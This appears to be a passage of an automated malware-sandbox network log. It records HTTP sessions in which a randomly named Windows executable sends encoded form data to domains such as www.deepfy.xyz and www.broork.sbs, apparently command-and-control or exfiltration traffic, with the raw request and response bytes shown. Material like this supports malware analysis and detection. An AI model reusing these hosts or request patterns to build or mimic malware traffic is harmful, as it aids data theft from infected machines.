                                                                                                                              content-type: text/html
                                                                                                                              content-length: 1251
                                                                                                                              date: Sat, 02 Nov 2024 07:14:24 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              vary: User-Agent
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                              Nov 2, 2024 08:14:24.717608929 CET271INData Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20
                                                                                                                              Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              40192.168.2.449380163.44.176.12803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:27.291881084 CET523OUTGET /51fd/?Z0WTZ=5XThc+sTNfSc1dyVCHius6QJlgyE7UD3g9QPrW9D0ZCA6InRQfgmSS7sY3ZsEANqCFm0SxAy1XScT67z0IieRfxf0Cr6BzHBArQcGKRuou4FU1nhplefNR0=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.broork.sbs
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:14:28.163489103 CET1236INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 1251
                                                                                                                              date: Sat, 02 Nov 2024 07:14:28 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              vary: User-Agent
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                              Nov 2, 2024 08:14:28.163512945 CET271INData Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20
                                                                                                                              Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              41192.168.2.449381199.59.243.227803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:33.409437895 CET777OUTPOST /t7p4/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.deepfy.xyz
                                                                                                                              Origin: http://www.deepfy.xyz
                                                                                                                              Referer: http://www.deepfy.xyz/t7p4/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 6f 2f 79 62 64 33 74 59 55 42 4e 44 39 72 70 66 5a 61 47 4b 54 69 4d 79 57 66 47 48 71 41 58 54 4d 31 35 78 63 4f 6e 67 74 4a 5a 70 7a 4b 51 5a 4d 64 55 55 72 61 69 74 4d 62 6b 48 56 4a 65 6e 6f 69 4d 45 57 39 6a 79 79 58 30 56 4f 30 51 6b 4d 41 53 77 45 72 50 37 75 35 48 52 43 64 62 73 71 45 79 38 33 37 4f 73 7a 6e 4b 75 42 4e 38 73 6f 34 70 74 35 64 39 55 6d 79 34 46 38 31 6f 73 61 61 75 72 72 69 34 38 33 67 77 31 37 6a 55 32 43 62 30 42 45 6f 41 35 46 6f 51 52 71 46 34 69 62 35 50 35 32 57 65 37 45 6d 34 53 65 38 42 66 71 70 76 53 57 75 4a 31 45 38 2f 38 2f 63 57 77 35 77 3d 3d
                                                                                                                              Data Ascii: Z0WTZ=o/ybd3tYUBND9rpfZaGKTiMyWfGHqAXTM15xcOngtJZpzKQZMdUUraitMbkHVJenoiMEW9jyyX0VO0QkMASwErP7u5HRCdbsqEy837OsznKuBN8so4pt5d9Umy4F81osaaurri483gw17jU2Cb0BEoA5FoQRqF4ib5P52We7Em4Se8BfqpvSWuJ1E8/8/cWw5w==
                                                                                                                              Nov 2, 2024 08:14:34.038485050 CET1236INHTTP/1.1 200 OK
                                                                                                                              date: Sat, 02 Nov 2024 07:14:33 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1110
                                                                                                                              x-request-id: 058ab3fb-7776-4d31-8c74-5419a713c15d
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==
                                                                                                                              set-cookie: parking_session=058ab3fb-7776-4d31-8c74-5419a713c15d; expires=Sat, 02 Nov 2024 07:29:33 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 6a 56 32 37 55 72 32 6e 63 65 79 73 58 47 6f 50 30 31 39 41 32 76 57 49 79 58 6f 77 71 33 36 33 32 46 57 2b 39 6e 71 5a 37 71 59 45 59 2f 48 38 66 54 48 65 36 4f 4d 6f 68 6a 2b 49 6b 4d 4e 6f 4d 73 64 73 4e 64 30 51 5a 4c 74 63 36 5a 57 42 77 72 77 46 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Nov 2, 2024 08:14:34.038499117 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDU4YWIzZmItNzc3Ni00ZDMxLThjNzQtNTQxOWE3MTNjMTVkIiwicGFnZV90aW1lIjoxNzMwNTMxNj


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              42192.168.2.449382199.59.243.227803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:35.945405960 CET797OUTPOST /t7p4/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.deepfy.xyz
                                                                                                                              Origin: http://www.deepfy.xyz
                                                                                                                              Referer: http://www.deepfy.xyz/t7p4/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 6f 2f 79 62 64 33 74 59 55 42 4e 44 39 4c 5a 66 62 39 71 4b 45 79 4d 78 4b 50 47 48 78 77 58 58 4d 31 31 78 63 4d 4c 77 74 2f 42 70 79 71 67 5a 50 63 55 55 71 61 69 74 44 37 6b 65 4b 5a 65 38 6f 69 42 37 57 2f 33 79 79 58 77 56 4f 77 63 6b 4e 33 6d 2f 46 37 50 35 32 4a 48 54 66 74 62 73 71 45 79 38 33 39 69 43 7a 6e 69 75 41 39 4d 73 70 5a 70 71 33 39 39 56 77 69 34 46 32 56 6f 6f 61 61 75 64 72 6e 59 57 33 6c 73 31 37 6d 77 32 62 71 30 47 4e 6f 42 54 42 6f 52 66 75 51 56 5a 56 59 79 61 2f 78 69 6c 61 79 38 72 53 61 4d 46 37 59 4f 46 45 75 74 47 5a 37 32 49 79 66 72 35 69 32 50 36 59 6d 4e 5a 43 72 70 57 4f 36 44 42 61 6b 43 53 52 6f 67 3d
                                                                                                                              Data Ascii: Z0WTZ=o/ybd3tYUBND9LZfb9qKEyMxKPGHxwXXM11xcMLwt/BpyqgZPcUUqaitD7keKZe8oiB7W/3yyXwVOwckN3m/F7P52JHTftbsqEy839iCzniuA9MspZpq399Vwi4F2VooaaudrnYW3ls17mw2bq0GNoBTBoRfuQVZVYya/xilay8rSaMF7YOFEutGZ72Iyfr5i2P6YmNZCrpWO6DBakCSRog=
                                                                                                                              Nov 2, 2024 08:14:36.590734005 CET1236INHTTP/1.1 200 OK
                                                                                                                              date: Sat, 02 Nov 2024 07:14:36 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1110
                                                                                                                              x-request-id: f52eec43-941c-4e26-86d7-ab998fc3cdc4
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==
                                                                                                                              set-cookie: parking_session=f52eec43-941c-4e26-86d7-ab998fc3cdc4; expires=Sat, 02 Nov 2024 07:29:36 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 6a 56 32 37 55 72 32 6e 63 65 79 73 58 47 6f 50 30 31 39 41 32 76 57 49 79 58 6f 77 71 33 36 33 32 46 57 2b 39 6e 71 5a 37 71 59 45 59 2f 48 38 66 54 48 65 36 4f 4d 6f 68 6a 2b 49 6b 4d 4e 6f 4d 73 64 73 4e 64 30 51 5a 4c 74 63 36 5a 57 42 77 72 77 46 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Nov 2, 2024 08:14:36.590749025 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjUyZWVjNDMtOTQxYy00ZTI2LTg2ZDctYWI5OThmYzNjZGM0IiwicGFnZV90aW1lIjoxNzMwNTMxNj


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              43192.168.2.449383199.59.243.227803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:38.516943932 CET10879OUTPOST /t7p4/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.deepfy.xyz
                                                                                                                              Origin: http://www.deepfy.xyz
                                                                                                                              Referer: http://www.deepfy.xyz/t7p4/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 6f 2f 79 62 64 33 74 59 55 42 4e 44 39 4c 5a 66 62 39 71 4b 45 79 4d 78 4b 50 47 48 78 77 58 58 4d 31 31 78 63 4d 4c 77 74 2f 35 70 7a 62 41 5a 50 2f 38 55 34 71 69 74 4b 62 6b 62 4b 5a 66 2b 6f 69 59 79 57 2f 71 4e 79 56 34 56 49 6c 41 6b 45 6d 6d 2f 4d 37 50 35 2f 70 48 4f 43 64 61 75 71 46 43 34 33 39 53 43 7a 6e 69 75 41 2f 55 73 74 49 70 71 36 64 39 55 6d 79 34 42 38 31 6f 45 61 63 47 4e 72 6e 55 73 33 57 30 31 37 47 67 32 41 34 63 47 52 34 41 31 47 6f 51 43 75 51 52 47 56 5a 65 73 2f 30 32 44 61 31 30 72 44 2f 6c 64 69 4b 6d 2f 53 6f 45 65 4a 71 65 78 79 39 44 33 37 46 7a 78 62 6b 41 4e 59 66 5a 71 46 37 79 78 48 52 71 31 4e 49 4c 39 4b 39 52 57 35 76 51 36 5a 36 57 33 69 34 6d 63 49 55 52 6b 53 78 32 4d 32 6e 4b 30 77 41 49 32 49 6c 6f 52 31 47 7a 6a 6b 30 6a 51 65 54 34 62 4b 4a 38 52 41 76 50 39 49 77 2f 75 45 30 61 4d 47 71 48 43 63 7a 61 45 5a 32 78 61 53 64 62 63 6e 76 32 75 61 2f 55 44 74 7a 6c 72 49 39 36 70 66 62 54 4d 73 42 64 33 57 5a 6d 2f 4e 4a 62 4e 48 6e 6a 75 [TRUNCATED]
                                                                                                                              Data Ascii: Z0WTZ=o/ybd3tYUBND9LZfb9qKEyMxKPGHxwXXM11xcMLwt/5pzbAZP/8U4qitKbkbKZf+oiYyW/qNyV4VIlAkEmm/M7P5/pHOCdauqFC439SCzniuA/UstIpq6d9Umy4B81oEacGNrnUs3W017Gg2A4cGR4A1GoQCuQRGVZes/02Da10rD/ldiKm/SoEeJqexy9D37FzxbkANYfZqF7yxHRq1NIL9K9RW5vQ6Z6W3i4mcIURkSx2M2nK0wAI2IloR1Gzjk0jQeT4bKJ8RAvP9Iw/uE0aMGqHCczaEZ2xaSdbcnv2ua/UDtzlrI96pfbTMsBd3WZm/NJbNHnju9YAiw8KnEtKjCml9IdfHtlb1M4TdPutb1r8HwFDzvyykNjZAYJhTrK1fpZt4eMF6MrjYtSmsejreuea9XG8aoKacMdhHNQtVThBWzgJIuVaanxYqDtjIkPciZXPypQ8qA+Vl5kI4rEKytH3M8tGjzaUlMC5RCVwxOy4z9LwdmCTv/CWdhaNCd5qr7nEbF+d0ANOlvOXa+EOzA6JxztJ4ihcKZEiJCy72vMvM6TYX4lHKYSAji37Fm4VKGlfyRzu95jCo4p9NuFF1oeQk92KDy1MF074TmwnIirsVVmf+ijxDTvN5NXVq5EkDExjX06M+XS+CgnMi13jcNeDAQ+/a9appPFtLENCgOsYhfAx8rQtzP5NwSMb0g7UifMA8YgpVhUtaz06+QvEs39Gma9PM0FT2j2F+UkOd3DtGxz7FM/5Y2cO30zNJKmT/BYbJ1Z/JjE7Syn1uNumMuY3fsmW2W2MD/NEGv2E+7MVIV+UAfTk2z/aoOkZWJtBFRYamzIoAs91MLtVGE1SdbpNaFwWM0eiwxp2Ntvv/w5s/UnLS4UtecJ26D9Us6aCsPQRyHGJbZ12O8Bw/L7QsnLB4MwD9DpI1QigNGF3D3rcf9NmN+3N0FvVdI8XtRNtpPeXVp++U7gI2cX+WcLlz3/Hj/pNTuO9twqO6rH8J+P [TRUNCATED]
                                                                                                                              Nov 2, 2024 08:14:39.165965080 CET1236INHTTP/1.1 200 OK
                                                                                                                              date: Sat, 02 Nov 2024 07:14:38 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1110
                                                                                                                              x-request-id: f7f18940-2233-4e27-84bb-8bafcd482ab5
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==
                                                                                                                              set-cookie: parking_session=f7f18940-2233-4e27-84bb-8bafcd482ab5; expires=Sat, 02 Nov 2024 07:29:39 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 6a 56 32 37 55 72 32 6e 63 65 79 73 58 47 6f 50 30 31 39 41 32 76 57 49 79 58 6f 77 71 33 36 33 32 46 57 2b 39 6e 71 5a 37 71 59 45 59 2f 48 38 66 54 48 65 36 4f 4d 6f 68 6a 2b 49 6b 4d 4e 6f 4d 73 64 73 4e 64 30 51 5a 4c 74 63 36 5a 57 42 77 72 77 46 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
